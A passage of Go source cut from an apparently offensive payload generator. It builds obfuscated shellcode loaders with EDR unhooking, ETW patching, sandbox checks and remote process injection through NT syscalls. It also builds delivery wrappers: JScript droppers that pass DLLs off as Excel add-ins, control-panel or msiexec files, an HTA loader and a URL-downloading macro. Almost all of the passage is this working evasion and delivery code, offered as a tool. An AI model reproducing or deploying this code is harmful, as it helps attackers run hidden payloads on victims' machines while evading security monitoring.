Binary.Variables["ciphertext"] = Utils.B64ripper(b64ciphertext, Binary.Variables["fullciphertext"], true) 410 | Binary.Variables["key"] = b64key 411 | Binary.Variables["iv"] = b64iv 412 | Binary.Variables["vkey"] = Cryptor.VarNumberLength(4, 12) 413 | Binary.Variables["viv"] = Cryptor.VarNumberLength(4, 12) 414 | Binary.Variables["block"] = Cryptor.VarNumberLength(4, 12) 415 | Binary.Variables["decrypted"] = Cryptor.VarNumberLength(4, 12) 416 | Binary.Variables["mode"] = Cryptor.VarNumberLength(4, 12) 417 | Binary.Variables["vciphertext"] = Cryptor.VarNumberLength(4, 12) 418 | Binary.Variables["rawdata"] = Cryptor.VarNumberLength(4, 12) 419 | Binary.Variables["stuff"] = Cryptor.VarNumberLength(4, 12) 420 | Binary.Variables["raw_bin"] = Cryptor.VarNumberLength(4, 12) 421 | Binary.Variables["hexdata"] = Cryptor.VarNumberLength(4, 12) 422 | Binary.Variables["PKCS5UnPadding"] = Cryptor.VarNumberLength(4, 12) 423 | Binary.Variables["length"] = Cryptor.VarNumberLength(4, 12) 424 | Binary.Variables["src"] = Cryptor.VarNumberLength(4, 12) 425 | Binary.Variables["unpadding"] = Cryptor.VarNumberLength(4, 12) 426 | 427 | Binary.Variables["loc"] = Cryptor.VarNumberLength(4, 12) 428 | Binary.Variables["dll"] = Cryptor.VarNumberLength(4, 12) 429 | Binary.Variables["error"] = Cryptor.VarNumberLength(4, 12) 430 | Binary.Variables["x"] = Cryptor.VarNumberLength(4, 12) 431 | Binary.Variables["file"] = Cryptor.VarNumberLength(4, 12) 432 | Binary.Variables["loaddll"] = Cryptor.VarNumberLength(4, 12) 433 | Binary.Variables["handle"] = Cryptor.VarNumberLength(4, 12) 434 | Binary.Variables["dllBase"] = Cryptor.VarNumberLength(4, 12) 435 | Binary.Variables["dllOffset"] = Cryptor.VarNumberLength(4, 12) 436 | Binary.Variables["old"] = Cryptor.VarNumberLength(4, 12) 437 | Binary.Variables["mem"] = Cryptor.VarNumberLength(4, 12) 438 | Binary.Variables["oldptrperms"] = Cryptor.VarNumberLength(4, 12) 439 | Binary.Variables["ptr"] = Cryptor.VarNumberLength(4, 12) 440 | Binary.Variables["shellcode"] = Cryptor.VarNumberLength(4, 12) 441 | Binary.Variables["oldshellcodeperms"] = Cryptor.VarNumberLength(4, 12) 442 | Binary.Variables["loader"] = Cryptor.VarNumberLength(4, 12) 443 | Binary.Variables["hexdata"] = Cryptor.VarNumberLength(4, 12) 444 | Binary.Variables["VirtualProtect"] = Cryptor.VarNumberLength(4, 12) 445 | Binary.Variables["procVirtualProtect"] = Cryptor.VarNumberLength(4, 12) 446 | Binary.Variables["Reloading"] = Cryptor.VarNumberLength(4, 12) 447 | Binary.Variables["bytes"] = Cryptor.VarNumberLength(4, 12) 448 | Binary.Variables["Console"] = Cryptor.VarNumberLength(4, 12) 449 | Binary.Variables["getWin"] = Cryptor.VarNumberLength(4, 12) 450 | Binary.Variables["showWin"] = Cryptor.VarNumberLength(4, 12) 451 | Binary.Variables["hwnd"] = Cryptor.VarNumberLength(4, 12) 452 | Binary.Variables["show"] = Cryptor.VarNumberLength(4, 12) 453 | Binary.Variables["SW_RESTORE"] = Cryptor.VarNumberLength(4, 12) 454 | Binary.Variables["SW_HIDE"] = Cryptor.VarNumberLength(4, 12) 455 | Binary.Variables["Version"] = Cryptor.VarNumberLength(4, 12) 456 | Binary.Variables["syscall"] = Cryptor.VarNumberLength(4, 12) 457 | Binary.Variables["Versionfunc"] = Cryptor.VarNumberLength(4, 12) 458 | Binary.Variables["k"] = Cryptor.VarNumberLength(4, 12) 459 | Binary.Variables["Version"] = Cryptor.VarNumberLength(4, 12) 460 | Binary.Variables["MV"] = Cryptor.VarNumberLength(4, 12) 461 | Binary.Variables["MinV"] = Cryptor.VarNumberLength(4, 12) 462 | Binary.Variables["syscallnumber"] = Cryptor.VarNumberLength(4, 12) 463 | Binary.Variables["NtProtectVirtualMemory"] = Cryptor.VarNumberLength(4, 12) 464 | Binary.Variables["bytesdata"] = Cryptor.VarNumberLength(4, 12) 465 | Binary.Variables["locdata"] = Cryptor.VarNumberLength(4, 12) 466 | Binary.Variables["xdata"] = Cryptor.VarNumberLength(4, 12) 467 | Binary.Variables["dllBasedata"] = Cryptor.VarNumberLength(4, 12) 468 | Binary.Variables["dllOffsetdata"] = Cryptor.VarNumberLength(4, 12) 469 | Binary.Variables["memdata"] = Cryptor.VarNumberLength(4, 12) 470 | Binary.Variables["customsyscall"] = Cryptor.VarNumberLength(4, 12) 471 | 472 | Binary.Variables["PROCESS_ALL_ACCESS"] = Cryptor.VarNumberLength(4, 12) 473 | Binary.Variables["errnoERROR_IO_PENDING"] = Cryptor.VarNumberLength(4, 12) 474 | Binary.Variables["errERROR_IO_PENDING"] = Cryptor.VarNumberLength(4, 12) 475 | 476 | Binary.Variables["handle"] = Cryptor.VarNumberLength(4, 12) 477 | Binary.Variables["regionsize"] = Cryptor.VarNumberLength(4, 12) 478 | Binary.Variables["runfunc"] = Cryptor.VarNumberLength(4, 12) 479 | Binary.Variables["oldptrperms"] = Cryptor.VarNumberLength(4, 12) 480 | Binary.Variables["oldfartcodeperms"] = Cryptor.VarNumberLength(4, 12) 481 | Binary.Variables["processHandle"] = Cryptor.VarNumberLength(4, 12) 482 | Binary.Variables["NewProtect"] = Cryptor.VarNumberLength(4, 12) 483 | Binary.Variables["sysid"] = Cryptor.VarNumberLength(4, 12) 484 | 485 | Binary.Variables["oldptrperms"] = Cryptor.VarNumberLength(4, 12) 486 | Binary.Variables["baseAddress"] = Cryptor.VarNumberLength(4, 12) 487 | Binary.Variables["regionSize"] = Cryptor.VarNumberLength(4, 12) 488 | Binary.Variables["oldprotect"] = Cryptor.VarNumberLength(4, 12) 489 | Binary.Variables["handlez"] = Cryptor.VarNumberLength(4, 12) 490 | 491 | Binary.Variables["CreateProcess"] = Cryptor.VarNumberLength(4, 12) 492 | Binary.Variables["GetModuleInformation"] = Cryptor.VarNumberLength(4, 12) 493 | Binary.Variables["ReloadRemoteProcess"] = Cryptor.VarNumberLength(4, 12) 494 | Binary.Variables["RemoteModuleReloading"] = Cryptor.VarNumberLength(4, 12) 495 | Binary.Variables["Target"] = Cryptor.VarNumberLength(4, 12) 496 | Binary.Variables["WriteProcessMemory"] = Cryptor.VarNumberLength(4, 12) 497 | Binary.Variables["addr"] = Cryptor.VarNumberLength(4, 12) 498 | Binary.Variables["buf"] = Cryptor.VarNumberLength(4, 12) 499 | Binary.Variables["bytes"] = Cryptor.VarNumberLength(4, 12) 500 | Binary.Variables["commandLine"] = Cryptor.VarNumberLength(4, 12) 501 | Binary.Variables["data"] = Cryptor.VarNumberLength(4, 12) 502 | Binary.Variables["dll"] = Cryptor.VarNumberLength(4, 12) 503 | Binary.Variables["dllBase"] = Cryptor.VarNumberLength(4, 12) 504 | Binary.Variables["dllOffset"] = Cryptor.VarNumberLength(4, 12) 505 | Binary.Variables["err"] = Cryptor.VarNumberLength(4, 12) 506 | Binary.Variables["file"] = Cryptor.VarNumberLength(4, 12) 507 | Binary.Variables["funcNtAllocateVirtualMemory"] = Cryptor.VarNumberLength(4, 12) 508 | Binary.Variables["funcNtCreateThreadEx"] = Cryptor.VarNumberLength(4, 12) 509 | Binary.Variables["funcNtProtectVirtualMemory"] = Cryptor.VarNumberLength(4, 12) 510 | Binary.Variables["funcNtWriteVirtualMemory"] = Cryptor.VarNumberLength(4, 12) 511 | Binary.Variables["hModule"] = Cryptor.VarNumberLength(4, 12) 512 | Binary.Variables["hProcess"] = Cryptor.VarNumberLength(4, 12) 513 | Binary.Variables["handle"] = Cryptor.VarNumberLength(4, 12) 514 | Binary.Variables["handleSize"] = Cryptor.VarNumberLength(4, 12) 515 | Binary.Variables["hh"] = Cryptor.VarNumberLength(4, 12) 516 | Binary.Variables["lpBaseAddress"] = Cryptor.VarNumberLength(4, 12) 517 | Binary.Variables["lpBuffer"] = Cryptor.VarNumberLength(4, 12) 518 | Binary.Variables["lpNumberOfBytesWritten"] = Cryptor.VarNumberLength(4, 12) 519 | Binary.Variables["mi"] = Cryptor.VarNumberLength(4, 12) 520 | Binary.Variables["MI"] = Cryptor.VarNumberLength(4, 12) 521 | Binary.Variables["mod"] = Cryptor.VarNumberLength(4, 12) 522 | Binary.Variables["modules"] = Cryptor.VarNumberLength(4, 12) 523 | Binary.Variables["module"] = Cryptor.VarNumberLength(4, 12) 524 | Binary.Variables["nLength"] = Cryptor.VarNumberLength(4, 12) 525 | Binary.Variables["nSize"] = Cryptor.VarNumberLength(4, 12) 526 | Binary.Variables["name"] = Cryptor.VarNumberLength(4, 12) 527 | Binary.Variables["needed"] = Cryptor.VarNumberLength(4, 12) 528 | Binary.Variables["n"] = Cryptor.VarNumberLength(4, 12) 529 | Binary.Variables["offsetaddr"] = Cryptor.VarNumberLength(4, 12) 530 | Binary.Variables["oldProtect"] = Cryptor.VarNumberLength(4, 12) 531 | Binary.Variables["outString"] = Cryptor.VarNumberLength(4, 12) 532 | Binary.Variables["pi"] = Cryptor.VarNumberLength(4, 12) 533 | Binary.Variables["procEnumProcessModules"] = Cryptor.VarNumberLength(4, 12) 534 | Binary.Variables["EnumProcessModules"] = Cryptor.VarNumberLength(4, 12) 535 | Binary.Variables["procGetModuleBaseName"] = Cryptor.VarNumberLength(4, 12) 536 | Binary.Variables["GetModuleBaseName"] = Cryptor.VarNumberLength(4, 12) 537 | Binary.Variables["procGetModuleInformation"] = Cryptor.VarNumberLength(4, 12) 538 | Binary.Variables["procWriteProcessMemory"] = Cryptor.VarNumberLength(4, 12) 539 | Binary.Variables["process"] = Cryptor.VarNumberLength(4, 12) 540 | Binary.Variables["rawbytes"] = Cryptor.VarNumberLength(4, 12) 541 | Binary.Variables["raw_bin"] = Cryptor.VarNumberLength(4, 12) 542 | Binary.Variables["regionsize"] = Cryptor.VarNumberLength(4, 12) 543 | Binary.Variables["s"] = Cryptor.VarNumberLength(4, 12) 544 | Binary.Variables["shellcode"] = Cryptor.VarNumberLength(4, 12) 545 | Binary.Variables["si"] = Cryptor.VarNumberLength(4, 12) 546 | Binary.Variables["size"] = Cryptor.VarNumberLength(4, 12) 547 | Binary.Variables["startupInfo"] = Cryptor.VarNumberLength(4, 12) 548 | Binary.Variables["x"] = Cryptor.VarNumberLength(4, 12) 549 | 550 | WindowsVersion.Variables["Version"] = Binary.Variables["Version"] 551 | WindowsVersion.Variables["syscall"] = Binary.Variables["syscall"] 552 | WindowsVersion.Variables["customsyscall"] = Binary.Variables["customsyscall"] 553 | 554 | buffer.Reset() 555 | WindowsVersionTemplate, err := template.New("WindowsVersion").Parse(Struct.WindowsVersion_Binary()) 556 | if err != nil { 557 | log.Fatal(err) 558 | 559 | } 560 | buffer.Reset() 561 | if err := WindowsVersionTemplate.Execute(&buffer, WindowsVersion); err != nil { 562 | log.Fatal(err) 563 | } 564 | Binary.Variables["SyscallNumberlist"] = buffer.String() 565 | buffer.Reset() 566 | 567 | if console == true && ProcessInjection == "" { 568 | Binary.Variables["hide"] = Binary.Variables["Console"] + "(true)" 569 | Binary.Variables["DebugImport"] = "\"io\"" 570 | Binary.Variables["Debug"] = ` 571 | var ( 572 | debugWriter io.Writer 573 | ) 574 | 575 | func printDebug(format string, v ...interface{}) { 576 | debugWriter = os.Stdout 577 | output := fmt.Sprintf("[DEBUG] ") 578 | output += format +"\n" 579 | fmt.Fprintf(debugWriter, output, v...) 580 | } 581 | ` 582 | Binary.Variables["RefreshPE"] = "printDebug(\"RefreshPE failed:\", err)" 583 | Binary.Variables["EDR"] = "printDebug(\"[+] EDR removed\")" 584 | Binary.Variables["ShellcodeString"] = "printDebug(\"[*] Loading shellcode into a string\")" 585 | Binary.Variables["Pointer"] = "printDebug(\"[*] Create a Pointer on stack\")" 586 | Binary.Variables["CopyPointer"] = "printDebug(\"[*] Copy Pointer's attributes\")" 587 | Binary.Variables["OverwrittenShellcode"] = "printDebug(\"[*] Overwriten Pointer to point to shellcode String\")" 588 | Binary.Variables["OverWrittenPoint"] = "printDebug(\"[*] Overwriting shellcode String with Pointer's attributes\")" 589 | Binary.Variables["ReloadingMessage"] = "printDebug(\"[+] Reloading: \"+name +\" \")" 590 | Binary.Variables["VersionMessage"] = "printDebug(\"[+] Detected Version: \" +" + WindowsVersion.Variables["Version"] + ")" 591 | 592 | } else if console == true && ProcessInjection != "" { 593 | Binary.Variables["hide"] = Binary.Variables["Console"] + "(true)" 594 | Binary.Variables["DebugImport"] = `"io" 595 | "os"` 596 | Binary.Variables["Debug"] = ` 597 | var ( 598 | debugWriter io.Writer 599 | ) 600 | 601 | func printDebug(format string, v ...interface{}) { 602 | debugWriter = os.Stdout 603 | output := fmt.Sprintf("[DEBUG] ") 604 | output += format +"\n" 605 | fmt.Fprintf(debugWriter, output, v...) 606 | } 607 | ` 608 | Binary.Variables["RefreshPE"] = "printDebug(\"RefreshPE failed:\", err)" 609 | Binary.Variables["EDR"] = "printDebug(\"[+] EDR removed\")" 610 | Binary.Variables["ShellcodeString"] = "printDebug(\"[*] Loading shellcode into a string\")" 611 | Binary.Variables["Pointer"] = "printDebug(\"[*] Create a Pointer on stack\")" 612 | Binary.Variables["CopyPointer"] = "printDebug(\"[*] Copy Pointer's attributes\")" 613 | Binary.Variables["OverwrittenShellcode"] = "printDebug(\"[*] Overwriten Pointer to point to shellcode String\")" 614 | Binary.Variables["OverWrittenPoint"] = "printDebug(\"[*] Overwriting shellcode String with Pointer's attributes\")" 615 | Binary.Variables["ReloadingMessage"] = "printDebug(\"[+] Reloading: \"+name +\" \")" 616 | Binary.Variables["VersionMessage"] = "printDebug(\"[+] Detected Version: \" +" + WindowsVersion.Variables["Version"] + ")" 617 | 618 | Binary.Variables["PPIDMessage"] = 619 | `strpid := fmt.Sprint(` + Binary.Variables["pi"] + `.ProcessId) 620 | printDebug("[*] Creating Remote Process: " + strpid) 621 | printDebug("[*] Creating Handle to Remote Process")` 622 | Binary.Variables["ModuleMessage"] = "printDebug(\"[*] Mapping Modules:\")" 623 | Binary.Variables["addr"] = Cryptor.VarNumberLength(4, 12) 624 | Binary.Variables["RemoteModuleEnumeration"] = 625 | `` + Binary.Variables["addr"] + `:= fmt.Sprintf("%X", ` + Binary.Variables["MI"] + `.LpBaseOfDll) 626 | printDebug("[+] " + ` + Binary.Variables["s"] + ` + "'s Base Address: " + ` + Binary.Variables["addr"] + `) 627 | printDebug("[*] Reloading " + ` + Binary.Variables["s"] + ` + "'s .Text Field")` 628 | Binary.Variables["RemoteModuleMessage"] = "printDebug(\"[+] Reloaded and unhooked EDR\")" 629 | Binary.Variables["RemoteReloading"] = "printDebug(\"[+] Interacting with Remote Process\")" 630 | Binary.Variables["Injecting"] = "printDebug(\"[+] Injecting Shellcode into Remote Process\")" 631 | Binary.Variables["Injected"] = "printDebug(\"[+] Injected!\")" 632 | 633 | } else { 634 | Binary.Variables["hide"] = Binary.Variables["Console"] + "(false)" 635 | Binary.Variables["DebugImport"] = "" 636 | Binary.Variables["Debug"] = "" 637 | Binary.Variables["RefreshPE"] = "" 638 | Binary.Variables["EDR"] = "" 639 | Binary.Variables["ShellcodeString"] = "" 640 | Binary.Variables["Pointer"] = "" 641 | Binary.Variables["CopyPointer"] = "" 642 | Binary.Variables["OverwrittenShellcode"] = "" 643 | Binary.Variables["OverWrittenPoint"] = "" 644 | Binary.Variables["ReloadingMessage"] = "" 645 | Binary.Variables["VersionMessage"] = "" 646 | 647 | Binary.Variables["RemoteModuleEnumeration"] = "" 648 | Binary.Variables["PPIDMessage"] = "" 649 | Binary.Variables["ModuleMessage"] = "" 650 | Binary.Variables["RemoteModuleMessage"] = "" 651 | Binary.Variables["RemoteReloading"] = "" 652 | Binary.Variables["Injecting"] = "" 653 | Binary.Variables["Injected"] = "" 654 | } 655 | 656 | if sandbox == true { 657 | Binary.Variables["IsDomainJoined"] = Cryptor.VarNumberLength(4, 12) 658 | Binary.Variables["domain"] = Cryptor.VarNumberLength(4, 12) 659 | Binary.Variables["status"] = Cryptor.VarNumberLength(4, 12) 660 | SandboxFunctionTemplate, err := template.New("Sandboxfunction").Parse(Struct.Sandbox()) 661 | if err != nil { 662 | log.Fatal(err) 663 | } 664 | if err := SandboxFunctionTemplate.Execute(&buffer, Binary); err != nil { 665 | log.Fatal(err) 666 | } 667 | Binary.Variables["Sandboxfunction"] = buffer.String() 668 | Binary.Variables["checker"] = Cryptor.VarNumberLength(4, 12) 669 | Sandbox_DomainJoinedTemplate, err := template.New("Sandbox_DomainJoined").Parse(Struct.Sandbox_DomainJoined()) 670 | buffer.Reset() 671 | if err != nil { 672 | log.Fatal(err) 673 | } 674 | if err := Sandbox_DomainJoinedTemplate.Execute(&buffer, Binary); err != nil { 675 | log.Fatal(err) 676 | } 677 | Binary.Variables["Sandbox"] = buffer.String() 678 | buffer.Reset() 679 | } else { 680 | Binary.Variables["Sandbox"] = "" 681 | Binary.Variables["Sandboxfunction"] = "" 682 | Binary.Variables["SandboxImport"] = "" 683 | } 684 | 685 | if ETW == true { 686 | ETW_Function, ETW := ETW_Buff() 687 | Binary.Variables["ETW"] = ETW + "()" 688 | Binary.Variables["ETW_Function"] = ETW_Function 689 | } else { 690 | Binary.Variables["ETW"] = "" 691 | Binary.Variables["ETW_Function"] = "" 692 | } 693 | 694 | if ProcessInjection != "" { 695 | ProcessInjection = strings.Replace(ProcessInjection, "\\", "\\\\", -1) 696 | Binary.Variables["processpath"] = ProcessInjection 697 | 698 | Structure = Struct.Procces_Injection() 699 | } else { 700 | Structure = Struct.Binary() 701 | } 702 | 703 | BinaryTemplate, err := template.New("Binary").Parse(Structure) 704 | if err != nil { 705 | log.Fatal(err) 706 | } 707 | if err := BinaryTemplate.Execute(&buffer, Binary); err != nil { 708 | log.Fatal(err) 709 | } 710 | return buffer.String() 711 | } 712 | 713 | func JScriptLoader_Buff(name string, filename string, mode string, sandbox bool) (string, string, string) { 714 | var LoaderTemplate string 715 | var buffer bytes.Buffer 716 | JScriptLoader := &JScriptLoader{} 717 | JScriptLoader.Variables = make(map[string]string) 718 | JScriptLoader.Variables["fso"] = Cryptor.VarNumberLength(4, 12) 719 | JScriptLoader.Variables["dropPath"] = Cryptor.VarNumberLength(4, 12) 720 | JScriptLoader.Variables["value"] = Cryptor.VarNumberLength(4, 12) 721 | JScriptLoader.Variables["strRegPath"] = Cryptor.VarNumberLength(4, 12) 722 | JScriptLoader.Variables["WshShell"] = Cryptor.VarNumberLength(4, 12) 723 | JScriptLoader.Variables["objShell"] = Cryptor.VarNumberLength(4, 12) 724 | if mode == "excel" { 725 | JScriptLoader.Variables["ApplicationName"] = "excel.exe" 726 | JScriptLoader.Variables["RegName"] = "Excel" 727 | JScriptLoader.Variables["dllext"] = ".xll" 728 | JScriptLoader.Variables["objapp"] = Cryptor.VarNumberLength(4, 12) 729 | JScriptLoader.Variables["Application_Version"] = Cryptor.VarNumberLength(4, 12) 730 | JScriptLoader.Variables["FileName"] = name 731 | JScriptLoader.Variables["filename"] = filename 732 | LoaderTemplate = Struct.JS_Office_Sub() 733 | } 734 | if mode == "control" { 735 | LoaderTemplate = Struct.JS_Control_Sub() 736 | JScriptLoader.Variables["dllext"] = ".cpl" 737 | JScriptLoader.Variables["filename"] = filename 738 | JScriptLoader.Variables["FileName"] = name 739 | } 740 | if mode == "msiexec" { 741 | LoaderTemplate = Struct.JS_Msiexec_Sub() 742 | JScriptLoader.Variables["dllext"] = ".dll" 743 | JScriptLoader.Variables["filename"] = filename 744 | JScriptLoader.Variables["FileName"] = name 745 | } 746 | if mode == "wscript" { 747 | JScriptLoader.Variables["dllext"] = ".dll" 748 | JScriptLoader.Variables["FileName"] = name 749 | JScriptLoader.Variables["DLLName"] = name 750 | JScriptLoader.Variables["manifest"] = Cryptor.VarNumberLength(4, 12) 751 | JScriptLoader.Variables["ax"] = Cryptor.VarNumberLength(4, 12) 752 | JScriptLoader.Variables["Execute"] = Cryptor.VarNumberLength(4, 12) 753 | JScriptLoader.Variables["progid"] = Cryptor.VarNumberLength(4, 12) 754 | JScriptLoader.Variables["filename"] = name 755 | LoaderTemplate = Struct.WS_JS() 756 | } 757 | buffer.Reset() 758 | JSLoaderTemplate, err := template.New("JScriptLoader").Parse(LoaderTemplate) 759 | if err != nil { 760 | log.Fatal(err) 761 | } 762 | buffer.Reset() 763 | if err = JSLoaderTemplate.Execute(&buffer, JScriptLoader); err != nil { 764 | log.Fatal(err) 765 | } 766 | 767 | return buffer.String(), JScriptLoader.Variables["fso"], JScriptLoader.Variables["dropPath"] 768 | 769 | } 770 | 771 | func JScript_Buff(fso string, dropPath string, encoded string, code string, name string, mode string, sandbox bool) string { 772 | var buffer bytes.Buffer 773 | JScript := &JScript{} 774 | SandboxJScript := &SandboxJScript{} 775 | JScript.Variables = make(map[string]string) 776 | SandboxJScript.Variables = make(map[string]string) 777 | JScript.Variables["DLLName"] = Cryptor.VarNumberLength(4, 12) 778 | JScript.Variables["fso"] = fso 779 | JScript.Variables["dropPath"] = dropPath 780 | JScript.Variables["Base64"] = Cryptor.VarNumberLength(4, 12) 781 | JScript.Variables["base6411"] = Cryptor.VarNumberLength(4, 12) 782 | JScript.Variables["rtest"] = Cryptor.VarNumberLength(4, 12) 783 | JScript.Variables["atest"] = Cryptor.VarNumberLength(4, 12) 784 | JScript.Variables["ctest"] = Cryptor.VarNumberLength(4, 12) 785 | JScript.Variables["ttest"] = Cryptor.VarNumberLength(4, 12) 786 | JScript.Variables["etest"] = Cryptor.VarNumberLength(4, 12) 787 | JScript.Variables["htest"] = Cryptor.VarNumberLength(4, 12) 788 | JScript.Variables["atest"] = Cryptor.VarNumberLength(4, 12) 789 | JScript.Variables["TextStream11"] = Cryptor.VarNumberLength(4, 12) 790 | JScript.Variables["res1"] = Cryptor.VarNumberLength(4, 12) 791 | JScript.Variables["filename1"] = Cryptor.VarNumberLength(4, 12) 792 | JScript.Variables["characters"] = Cryptor.VarNumberLength(4, 12) 793 | JScript.Variables["base6411decoded"] = Cryptor.VarNumberLength(4, 12) 794 | JScript.Variables["BinaryStream"] = Cryptor.VarNumberLength(4, 12) 795 | JScript.Variables["binaryWriter"] = Cryptor.VarNumberLength(4, 12) 796 | JScript.Variables["dllname"] = "" 797 | JScript.Variables["dllvar"] = Cryptor.VarNumberLength(4, 12) 798 | JScript.Variables["dll"] = Utils.B64ripper(encoded, JScript.Variables["dllvar"], false) 799 | JScript.Variables["Loader"] = code 800 | if mode == "excel" { 801 | JScript.Variables["dllext"] = ".xll" 802 | JScript.Variables["FileName"] = name 803 | } 804 | if mode == "control" { 805 | JScript.Variables["dllext"] = ".cpl" 806 | JScript.Variables["FileName"] = name 807 | } 808 | if mode == "wscript" { 809 | JScript.Variables["dllext"] = ".dll" 810 | JScript.Variables["FileName"] = name 811 | } 812 | if mode == "msiexec" { 813 | JScript.Variables["dllext"] = ".dll" 814 | JScript.Variables["FileName"] = name 815 | } 816 | buffer.Reset() 817 | JSTemplate, err := template.New("JScript").Parse(Struct.JSfile()) 818 | if err != nil { 819 | log.Fatal(err) 820 | } 821 | buffer.Reset() 822 | if err = JSTemplate.Execute(&buffer, JScript); err != nil { 823 | log.Fatal(err) 824 | } 825 | 826 | if sandbox == true { 827 | SandboxJScript.Variables["objShell"] = Cryptor.VarNumberLength(4, 12) 828 | SandboxJScript.Variables["domain"] = Cryptor.VarNumberLength(4, 12) 829 | SandboxJScript.Variables["loader"] = buffer.String() 830 | buffer.Reset() 831 | SandboxJSTemplate, err := template.New("SandboxJScript").Parse(Struct.WScript_Sandbox()) 832 | if err != nil { 833 | log.Fatal(err) 834 | } 835 | if err = SandboxJSTemplate.Execute(&buffer, SandboxJScript); err != nil { 836 | log.Fatal(err) 837 | } 838 | } else { 839 | 840 | } 841 | return buffer.String() 842 | } 843 | 844 | func HTA_Buff(hexcode string, filename string) string { 845 | var buffer bytes.Buffer 846 | HTALoader := &HTALoader{} 847 | HTALoader.Variables = make(map[string]string) 848 | HTALoader.Variables["payload"] = hexcode 849 | HTALoader.Variables["filename"] = filename 850 | HTALoader.Variables["RNZyt"] = Cryptor.VarNumberLength(4, 9) 851 | HTALoader.Variables["bogusWindows1252Chars"] = Cryptor.VarNumberLength(4, 9) 852 | HTALoader.Variables["correctLatin1Chars"] = Cryptor.VarNumberLength(4, 9) 853 | HTALoader.Variables["fos"] = Cryptor.VarNumberLength(4, 9) 854 | HTALoader.Variables["obshell"] = Cryptor.VarNumberLength(4, 9) 855 | HTALoader.Variables["pathworks"] = Cryptor.VarNumberLength(4, 9) 856 | HTALoader.Variables["dest"] = Cryptor.VarNumberLength(4, 9) 857 | HTALoader.Variables["fromByte"] = Cryptor.VarNumberLength(4, 9) 858 | HTALoader.Variables["decode"] = Cryptor.VarNumberLength(4, 9) 859 | HTALoader.Variables["chunkSize"] = Cryptor.VarNumberLength(4, 9) 860 | HTALoader.Variables["source"] = Cryptor.VarNumberLength(4, 9) 861 | HTALoader.Variables["decodedFile"] = Cryptor.VarNumberLength(4, 9) 862 | HTALoader.Variables["decode"] = Cryptor.VarNumberLength(4, 9) 863 | HTALoader.Variables["hexString"] = Cryptor.VarNumberLength(4, 9) 864 | HTALoader.Variables["fromByte"] = Cryptor.VarNumberLength(4, 9) 865 | HTALoader.Variables["decodedFile"] = Cryptor.VarNumberLength(4, 9) 866 | HTALoader.Variables["sleep"] = Cryptor.VarNumberLength(4, 9) 867 | HTALoader.Variables["obshell"] = Cryptor.VarNumberLength(4, 9) 868 | HTALoader.Variables["test1"] = Cryptor.VarNumberLength(4, 9) 869 | 870 | buffer.Reset() 871 | HTATemplate, err := template.New("HTALoader").Parse(Struct.HTA()) 872 | if err != nil { 873 | log.Fatal(err) 874 | } 875 | buffer.Reset() 876 | if err = HTATemplate.Execute(&buffer, HTALoader); err != nil { 877 | log.Fatal(err) 878 | } 879 | return buffer.String() 880 | } 881 | 882 | func Macro_Buff(URL string, outFile string) { 883 | var buffer bytes.Buffer 884 | macro := &Macro{} 885 | macro.Variables = make(map[string]string) 886 | macro.Variables["HTTPReq"] = Cryptor.VarNumberLength(4, 9) 887 | macro.Variables["t"] = Cryptor.VarNumberLength(4, 9) 888 | macro.Variables["remoteFile"] = Cryptor.VarNumberLength(4, 9) 889 | macro.Variables["pathOfFile"] = Cryptor.VarNumberLength(4, 9) 890 | macro.Variables["obj"] = Cryptor.VarNumberLength(4, 9) 891 | macro.Variables["Full"] = Cryptor.VarNumberLength(4, 9) 892 | macro.Variables["output"] = Cryptor.VarNumberLength(4, 9) 893 | macro.Variables["storeIn"] = Cryptor.VarNumberLength(4, 9) 894 | macro.Variables["sleep"] = Cryptor.VarNumberLength(4, 9) 895 | macro.Variables["outFile"] = outFile 896 | macro.Variables["URL"] = URL 897 | 898 | buffer.Reset() 899 | macroTemplate, err := template.New("macro").Parse(Struct.Macro()) 900 | if err != nil { 901 | log.Fatal(err) 902 | } 903 | buffer.Reset() 904 | if err := macroTemplate.Execute(&buffer, macro); err != nil { 905 | log.Fatal(err) 906 | } 907 | fmt.Println(buffer.String()) 908 | } 909 | 910 | func CompileFile(b64ciphertext string, b64key string, b64iv string, mode string, outFile string, refresher bool, console bool, sandbox bool, ETW bool, ProcessInjection string) (string, string) { 911 | var code string 912 | name, filename := FileName(mode) 913 | if ETW == true { 914 | fmt.Println("[+] Patched ETW Enabled") 915 | } 916 | if ProcessInjection != "" && ETW == true { 917 | fmt.Println("[!] Warning ETW Will Only be Patched in the Primarly Process Not the Created One") 918 | } 919 | if ProcessInjection != "" { 920 | fmt.Println("[+] Process Injection Mode Enabled") 921 | fmt.Println("[*] Created Process: " + ProcessInjection) 922 | } 923 | if mode == "excel" || mode == "wscript" || mode == "control" || mode == "dll" || mode == "msiexec" { 924 | code = DLLfile(b64ciphertext, b64key, b64iv, mode, refresher, name, sandbox, ETW, ProcessInjection) 925 | } else { 926 | code = Binaryfile(b64ciphertext, b64key, b64iv, mode, console, sandbox, name, ETW, ProcessInjection) 927 | } 928 | os.MkdirAll(name, os.ModePerm) 929 | Utils.Writefile(name+"/"+name+".go", code) 930 | Utils.B64decode("loader.zip") 931 | Utils.Unzip("loader.zip", name) 932 | os.RemoveAll("loader.zip") 933 | os.Chdir(name) 934 | return name, filename 935 | } 936 | func CompileLoader(mode string, outFile string, filename string, name string, CommandLoader string, URL string, sandbox bool) { 937 | if mode == "excel" { 938 | os.Rename(name+".dll", name+".xll") 939 | } else if mode == "control" { 940 | os.Rename(name+".dll", name+".cpl") 941 | if outFile == "" { 942 | os.Chdir("..") 943 | os.Rename(name+"/"+name+".cpl", name+".cpl") 944 | os.RemoveAll(name) 945 | fmt.Println("[+] " + name + ".cpl File Ready") 946 | if CommandLoader == "control" { 947 | outFile = name + ".cpl" 948 | Utils.Command(URL, CommandLoader, outFile) 949 | } 950 | return 951 | } 952 | } else if mode == "wscript" { 953 | os.Rename(outFile+".dll", name+".dll") 954 | } else if mode == "msiexec" { 955 | os.Rename(outFile+".dll", name+".dll") 956 | } else if mode == "binary" { 957 | os.Chdir("..") 958 | os.Rename(name+"/"+name+".exe", name+".exe") 959 | os.RemoveAll(name) 960 | fmt.Println("[+] Binary Compiled") 961 | if CommandLoader == "bits" { 962 | outFile = name + ".exe" 963 | Utils.Command(URL, CommandLoader, outFile) 964 | } 965 | return 966 | } else if mode == "dll" { 967 | os.Chdir("..") 968 | os.Rename(name+"/"+name+".dll", name+".dll") 969 | os.RemoveAll(name) 970 | fmt.Println("[+] DLL Compiled") 971 | fmt.Println("[!] Note: Loading a dll (with Rundll32 or Regsvr32) that has the same name as a valid system DLL will cause problems, in this case its best to change the name slightly") 972 | return 973 | } 974 | fmt.Println("[*] Creating Loader") 975 | code, fso, dropPath := 